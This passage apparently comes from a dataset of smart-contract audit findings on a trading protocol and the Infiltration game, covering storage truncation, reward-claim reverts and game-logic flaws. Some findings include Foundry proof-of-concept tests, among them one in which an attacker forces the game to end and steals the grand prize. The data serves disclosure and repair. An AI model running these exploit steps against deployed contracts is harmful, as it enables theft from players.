this variable, such as `_liquidationFee()`.","```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n" +interfaceFee Incorrectly converted uint40 when stored,medium,"The `interfaceFee.amount` is currently defined as `uint48` , with a maximum value of approximately `281m`. However, it is incorrectly converted to `uint40` when saved, `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`, which means the maximum value can only be approximately `1.1M`. If a user sets an order where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully but the actual stored value may be truncated to `0`. This is not what the user expects, and the user may think that the order has been set, but in reality, it is an incorrect order. 
Although a fee of `1.1M` is large, it is not impossible.\\n`interfaceFee.amount` is defined as `uint48` the legality check also uses `type(uint48).max`, but `uint40` is used when saving.\\n```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n\\nWe can see that when saving, 
it is forcibly converted to `uint40`, as in `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`. The order can be saved successfully, but the actual storage may be truncated to `0`.","```\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n// Remove the line below\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n// Add the line below\\n uint48(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n","For orders where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully, but the actual storage may be truncated to `0`. This is not what users expect and may lead to incorrect fee payments when the order is executed. 
Although a fee of `1.1M` is large, it is not impossible.","```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n" +"vault.claimReward() If have a market without reward token, it may cause all markets to be unable to retrieve rewards.",medium,"In `vault.claimReward()`, it 
will loop through all `market` of `vault` to execute `claimReward()`, and transfer `rewards` to `factory().owner()`. If one of the markets does not have `rewards`, that is, `rewardToken` is not set, `Token18 reward = address(0)`. Currently, the loop does not make this judgment `reward != address(0)`, it will also execute `market.claimReward()`, and the entire method will `revert`. This leads to other markets with `rewards` also being unable to retrieve `rewards`.\\nThe current implementation of `vault.claimReward()` is as follows:\\n```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n\\nWe can see that the method loops through all the `market` and executes `market.claimReward()`, and `reward().push()`.\\nThe problem is, not every market has `rewards` tokens. market.sol's `rewards` are not forcibly set in `initialize()`. 
The market's `makerRewardRate.makerRewardRate` is also allowed to be 0.\\n```\\ncontract Market is IMarket, Instance, ReentrancyGuard {\\n /// @dev The token that incentive rewards are paid in\\n Token18 public reward;\\n\\n function initialize(IMarket.MarketDefinition calldata definition_) external initializer(1) {\\n __Instance__initialize();\\n __ReentrancyGuard__initialize();\\n\\n token = definition_.token;\\n oracle = definition_.oracle;\\n payoff = definition_.payoff;\\n }\\n// rest of code\\n\\n\\nlibrary MarketParameterStorageLib {\\n// rest of code\\n function validate(\\n MarketParameter memory self,\\n ProtocolParameter memory protocolParameter,\\n Token18 reward\\n ) public pure {\\n if (self.settlementFee.gt(protocolParameter.maxFeeAbsolute)) revert MarketParameterStorageInvalidError();\\n\\n if (self.fundingFee.max(self.interestFee).max(self.positionFee).gt(protocolParameter.maxCut))\\n revert MarketParameterStorageInvalidError();\\n\\n if (self.oracleFee.add(self.riskFee).gt(UFixed6Lib.ONE)) revert MarketParameterStorageInvalidError();\\n\\n if (\\n reward.isZero() &&\\n (!self.makerRewardRate.isZero() || !self.longRewardRate.isZero() || !self.shortRewardRate.isZero())\\n ) revert MarketParameterStorageInvalidError();\\n```\\n\\nThis means that `market.sol` can be without `rewards token`.\\nIf there is such a market, the current `vault.claimReward()` will `revert`, causing other markets with `rewards` to also be unable to retrieve `rewards`.",```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (_registrations[marketId].read().market.reward().isZero()) continue;\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n,"If the `vault` contains markets without `rewards`, it will cause other markets with `rewards` to also 
be unable to retrieve `rewards`.",```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n +_killWoundedAgents,high,"The `_killWoundedAgents` function only checks the status of the agent, not when it was wounded.\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n\\nSo when `fulfillRandomWords` kills agents that were wounded and unhealed at round `currentRoundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD`, it will also kill the agent who was healed and wounded again after that round.\\nAlso, since `fulfillRandomWords` first draws the new wounded agents before kills agents, in the worst case scenario, agent could die immediately after being wounded in this round.\\n```\\nif (activeAgents > NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n uint256 woundedAgents = _woundRequestFulfilled(\\n currentRoundId,\\n currentRoundAgentsAlive,\\n activeAgents,\\n currentRandomWord\\n );\\n\\n uint256 deadAgentsFromKilling;\\n if (currentRoundId > ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD) {\\n deadAgentsFromKilling = _killWoundedAgents({\\n roundId: currentRoundId.unsafeSubtract(ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD),\\n currentRoundAgentsAlive: currentRoundAgentsAlive\\n });\\n }\\n```\\n\\nThis is the PoC test code. 
You can add it to the Infiltration.fulfillRandomWords.t.sol file and run it.\\n```\\nfunction test_poc() public {\\n\\n _startGameAndDrawOneRound();\\n\\n uint256[] memory randomWords = _randomWords();\\n uint256[] memory woundedAgentIds;\\n\\n for (uint256 roundId = 2; roundId <= ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1; roundId++) {\\n\\n if(roundId == 2) { // heal agent. only woundedAgentIds[0] dead.\\n (woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 1});\\n assertEq(woundedAgentIds.length, 20);\\n\\n _drawXRounds(1);\\n\\n _heal({roundId: 3, woundedAgentIds: woundedAgentIds});\\n\\n _startNewRound();\\n\\n // everyone except woundedAgentIds[0] is healed\\n uint256 agentIdThatWasKilled = woundedAgentIds[0];\\n\\n IInfiltration.HealResult[] memory healResults = new IInfiltration.HealResult[](20);\\n for (uint256 i; i < 20; i++) {\\n healResults[i].agentId = woundedAgentIds[i];\\n\\n if (woundedAgentIds[i] == agentIdThatWasKilled) {\\n healResults[i].outcome = IInfiltration.HealOutcome.Killed;\\n } else {\\n healResults[i].outcome = IInfiltration.HealOutcome.Healed;\\n }\\n }\\n\\n expectEmitCheckAll();\\n emit HealRequestFulfilled(3, healResults);\\n\\n expectEmitCheckAll();\\n emit RoundStarted(4);\\n\\n randomWords[0] = (69 * 10_000_000_000) + 9_900_000_000; // survival rate 99%, first one gets killed\\n\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(3), randomWords);\\n\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n if (woundedAgentIds[i] != agentIdThatWasKilled) {\\n _assertHealedAgent(woundedAgentIds[i]);\\n }\\n }\\n\\n roundId += 2; // round 2, 3 used for healing\\n }\\n\\n _startNewRound();\\n\\n // Just so that each round has different random words\\n randomWords[0] += roundId;\\n\\n if (roundId == ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1) { // wounded agents at round 1 are healed, only woundedAgentIds[0] was dead.\\n (uint256[] memory woundedAgentIdsFromRound, ) = 
infiltration.getRoundInfo({\\n roundId: uint40(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD)\\n });\\n\\n // find re-wounded agent after healed\\n uint256[] memory woundedAfterHeal = new uint256[](woundedAgentIds.length);\\n uint256 totalWoundedAfterHeal;\\n for (uint256 i; i < woundedAgentIds.length; i ++){\\n uint256 index = infiltration.agentIndex(woundedAgentIds[i]);\\n IInfiltration.Agent memory agent = infiltration.getAgent(index);\\n if (agent.status == IInfiltration.AgentStatus.Wounded) {\\n woundedAfterHeal[i] = woundedAgentIds[i]; // re-wounded agent will be killed\\n totalWoundedAfterHeal++;\\n }\\n else{\\n woundedAfterHeal[i] = 0; // set not wounded again 0\\n }\\n\\n }\\n expectEmitCheckAll();\\n emit Killed(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD, woundedAfterHeal);\\n }\\n\\n expectEmitCheckAll();\\n emit RoundStarted(roundId + 1);\\n\\n uint256 requestId = _computeVrfRequestId(uint64(roundId));\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(requestId, randomWords);\\n }\\n}\\n```\\n","Check woundedAt at `_killWoundedAgents`\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n// Remove the line below\\n if (agents[index].status == AgentStatus.Wounded) {\\n// Add the line below\\n if (agents[index].status == AgentStatus.Wounded && agents[index].woundedAt == roundId) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n","The user pays tokens to keep the agent alive, but agent will die even if agent success to healed. 
The user has lost tokens and is forced out of the game.","```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n" +Attacker can steal reward of actual winner by force ending the game,high,"Currently following scenario is possible: There is an attacker owning some lower index agents and some higher index agents. There is a normal user owing one agent with an index between the attackers agents. If one of the attackers agents with an lower index gets wounded, he can escape all other agents and will instantly win the game, even if the other User has still one active agent.\\nThis is possible because because the winner is determined by the agent index, and escaping all agents at once wont kill the wounded agent because the game instantly ends.\\nFollowing check inside startNewRound prevents killing of wounded agents by starting a new round:\\n```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n\\nFollowing check inside of claimPrize pays price to first ID agent:\\n```\\nuint256 agentId = agents[1].agentId;\\n_assertAgentOwnership(agentId);\\n```\\n\\nSee following POC:\\nPOC\\nPut this into Infiltration.mint.t.sol and run `forge test --match-test forceWin -vvv`\\n```\\nfunction test_forceWin() public {\\n address attacker = address(1337);\\n\\n //prefund attacker and user1\\n vm.deal(user1, PRICE * MAX_MINT_PER_ADDRESS);\\n vm.deal(attacker, PRICE * MAX_MINT_PER_ADDRESS);\\n\\n // MINT some agents\\n vm.warp(_mintStart());\\n // attacker wants to make sure he owns a bunch of agents 
with low IDs!!\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n // For simplicity we mint only 1 agent to user 1 here, but it could be more, they could get wounded, etc.\\n vm.prank(user1);\\n infiltration.mint{value: PRICE *1}({quantity: 1});\\n //Attacker also wants a bunch of agents with the highest IDs, as they are getting swapped with the killed agents (move forward)\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n \\n vm.warp(_mintEnd());\\n\\n //start the game\\n vm.prank(owner);\\n infiltration.startGame();\\n\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n randomWords[0] = 69_420;\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(1), randomWords);\\n // Now we are in round 2 we do have 1 wounded agent (but we can imagine any of our agent got wounded, doesn´t really matter)\\n \\n // we know with our HARDCODED RANDOMNESS THAT AGENT 3 gets wounded!!\\n\\n // Whenever we get in a situation, that we own all active agents, but 1 and our agent has a lower index we can instant win the game!!\\n // This is done by escaping all agents, at once, except the lowest index\\n uint256[] memory escapeIds = new uint256[](59);\\n escapeIds[0] = 1;\\n escapeIds[1] = 2;\\n uint256 i = 4; //Scipping our wounded AGENT 3\\n for(; i < 31;) {\\n escapeIds[i-2] = i;\\n unchecked {++i;}\\n }\\n //skipping 31 as this owned by user1\\n unchecked {++i;}\\n for(; i < 62;) {\\n escapeIds[i-3] = i;\\n unchecked {++i;}\\n }\\n vm.prank(attacker);\\n infiltration.escape(escapeIds);\\n\\n (uint16 activeAgents, uint16 woundedAgents, , uint16 deadAgents, , , , , , , ) = infiltration.gameInfo();\\n console.log(""Active"", activeAgents);\\n assertEq(activeAgents, 1);\\n // This will end the game instantly.\\n //owner should not be able to start new round\\n vm.roll(block.number + BLOCKS_PER_ROUND);\\n vm.prank(owner);\\n vm.expectRevert();\\n 
infiltration.startNewRound();\\n\\n //Okay so the game is over, makes sense!\\n // Now user1 has the only active AGENT, so he should claim the grand prize!\\n // BUT user1 cannot\\n vm.expectRevert(IInfiltration.NotAgentOwner.selector);\\n vm.prank(user1);\\n infiltration.claimGrandPrize();\\n\\n //instead the attacker can:\\n vm.prank(attacker);\\n infiltration.claimGrandPrize();\\n \\n```\\n",Start a new Round before the real end of game to clear all wounded agents and reorder IDs.,"Attacker can steal the grand prize of the actual winner by force ending the game through escapes.\\nThis also introduces problems if there are other players with wounded agents but lower < 50 TokenID, they can claim prizes for wounded agents, which will break parts of the game logic.",```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n +Agents with Healing Opportunity Will Be Terminated Directly if The `escape` Reduces activeAgents to the Number of `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS` or Fewer,medium,"In each round, agents have the opportunity to either `escape` or `heal` before the `_requestForRandomness` function is called. However, the order of execution between these two functions is not specified, and either one can be executed at any time just before `startNewRound`. Typically, this isn't an issue. 
However, the problem arises when there are only a few Active Agents left in the game.\\nOn one hand, the `heal` function requires that the number of `gameInfo.activeAgents` is greater than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`.\\n```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n\\nOn the other hand, the `escape` function will directly set the status of agents to ""ESCAPE"" and reduce the count of `gameInfo.activeAgents`.\\n```\\n function escape(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n\\n uint256 agentIdsCount = agentIds.length;\\n _assertNotEmptyAgentIdsArrayProvided(agentIdsCount);\\n\\n uint256 activeAgents = gameInfo.activeAgents;\\n uint256 activeAgentsAfterEscape = activeAgents - agentIdsCount;\\n _assertGameIsNotOverAfterEscape(activeAgentsAfterEscape);\\n\\n uint256 currentRoundAgentsAlive = agentsAlive();\\n\\n uint256 prizePool = gameInfo.prizePool;\\n uint256 secondaryPrizePool = gameInfo.secondaryPrizePool;\\n uint256 reward;\\n uint256[] memory rewards = new uint256[](agentIdsCount);\\n\\n for (uint256 i; i < agentIdsCount; ) {\\n uint256 agentId = agentIds[i];\\n _assertAgentOwnership(agentId);\\n\\n uint256 index = agentIndex(agentId);\\n _assertAgentStatus(agents[index], agentId, AgentStatus.Active);\\n\\n uint256 totalEscapeValue = prizePool / currentRoundAgentsAlive;\\n uint256 rewardForPlayer = (totalEscapeValue * _escapeMultiplier(currentRoundAgentsAlive)) /\\n ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n rewards[i] = rewardForPlayer;\\n reward += rewardForPlayer;\\n\\n uint256 rewardToSecondaryPrizePool = (totalEscapeValue.unsafeSubtract(rewardForPlayer) *\\n _escapeRewardSplitForSecondaryPrizePool(currentRoundAgentsAlive)) / ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n\\n 
unchecked {\\n prizePool = prizePool - rewardForPlayer - rewardToSecondaryPrizePool;\\n }\\n secondaryPrizePool += rewardToSecondaryPrizePool;\\n\\n _swap({\\n currentAgentIndex: index,\\n lastAgentIndex: currentRoundAgentsAlive,\\n agentId: agentId,\\n newStatus: AgentStatus.Escaped\\n });\\n\\n unchecked {\\n --currentRoundAgentsAlive;\\n ++i;\\n }\\n }\\n\\n // This is equivalent to\\n // unchecked {\\n // gameInfo.activeAgents = uint16(activeAgentsAfterEscape);\\n // gameInfo.escapedAgents += uint16(agentIdsCount);\\n // }\\n```\\n\\nThrerefore, if the `heal` function is invoked first then the corresponding Wounded Agents will be healed in function `fulfillRandomWords`. If the `escape` function is invoked first and the number of `gameInfo.activeAgents` becomes equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the `heal` function will be disable. This obviously violates the fairness of the game.\\nExample\\nConsider the following situation:\\nAfter Round N, there are 100 agents alive. And, 1 Active Agent wants to `escape` and 10 Wounded Agents want to `heal`.\\nRound N:\\nActive Agents: 51\\nWounded Agents: 49\\nHealing Agents: 0\\nAccording to the order of execution, there are two situations. Please note that the result is calculated only after `_healRequestFulfilled`, so therer are no new wounded or dead agents\\nFirst, invoking `escape` before `heal`. `heal` is disable and all Wounded Agents are killed because there are not enough Active Agents.\\nRound N+1:\\nActive Agents: 50\\nWounded Agents: 0\\nHealing Agents: 0\\nSecond, invoking `heal` before `escape`. Suppose that `heal` saves 5 agents, and we got:\\nRound N+1:\\nActive Agents: 55\\nWounded Agents: 39\\nHealing Agents: 0\\nObviously, different execution orders lead to drastically different outcomes, which affects the fairness of the game.",It is advisable to ensure that the `escape` function is always called after the `heal` function in every round. 
This guarantees that every wounded agent has the opportunity to `heal` themselves when there are a sufficient number of `activeAgents` at the start of each round. This approach can enhance fairness and gameplay balance.,"If some Active Agents choose to escape, causing the count of `activeAgents` to become equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the Wounded Agents will lose their final chance to heal themselves.\\nThis situation can significantly impact the game's fairness. The Wounded Agents would have otherwise had the opportunity to heal themselves and continue participating in the game. However, the escape of other agents leads to their immediate termination, depriving them of that chance.","```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n" +Wound agent can't invoke heal in the next round,medium,"Assume players being marked as wounded in the round `12` , players cannot invoke `heal` in the next round 13\\n```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n 
assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n",```\\n // No need to check if the heal deadline has passed as the agent would be killed\\n unchecked {\\n- if (currentRoundId - woundedAt < 2) {\\n- if (currentRoundId - woundedAt < 1) {\\n revert HealingMustWaitAtLeastOneRound();\\n }\\n }\\n```\\n,User have to wait for 1 more round which led to the odds for an Agent to heal successfully start at 99% at Round 1 reduce to 98% at Round 2.,"```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n" +fulfillRandomWords() could revert under certain circumstances,medium,"Crucial part of my POC is the variable AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS. I communicated with the protocol's team that they plan to set it to 20 initially but it is possible to have a different value for it in future. 
For the POC i used 30.\\n```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n\\nI put this test into Infiltration.startNewRound.t.sol and used --gas-report to see that the gas used for fulfillRandomWords exceeds 2 500 000.","A couple of ideas :\\nYou can limit the value of AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS to a small enough number so that it is 100% sure it will not reach the gas limit.\\nConsider simply storing the randomness and taking more complex follow-on actions in separate contract calls as stated in the ""Security Considerations"" section of the VRF's docs.",DOS of the protocol and inability to continue the game.,"```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n 
